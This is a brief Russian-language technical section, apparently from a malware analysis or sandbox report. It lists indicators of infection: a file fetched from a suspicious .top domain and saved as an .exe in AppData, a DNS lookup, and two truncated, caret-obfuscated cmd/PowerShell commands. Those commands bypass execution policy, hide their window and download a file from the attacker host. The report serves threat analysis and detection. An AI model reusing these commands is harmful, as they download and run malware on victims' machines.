Техническая информация
- http://roggistazli.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OWeR^SHe^LL.^e^x^E^ -EX^ecut^IOn^pOL^I^cY ^bypAs^s -^NO^PRO^Fi^le^ -wIN^dOwSt^yLe ^h^I^DdEN (n^EW^-oB^jeC^t^ SYsTEM^.^NE^t.w^EBc^lIEn^t^).DoWnL^OAd^F^iL^e(^'http://roggistazli.top/...
- DNS ASK ro###stazli.top
- '<SYSTEM32>\cmd.exe' /c "P^OWeR^SHe^LL.^e^x^E^ -EX^ecut^IOn^pOL^I^cY ^bypAs^s -^NO^PRO^Fi^le^ -wIN^dOwSt^yLe ^h^I^DdEN (n^EW^-oB^jeC^t^ SYsTEM^.^NE^t.w^EBc^lIEn^t^).DoWnL^OAd^F^iL^e(^'http://roggistazli.top/...' (со скрытым окном)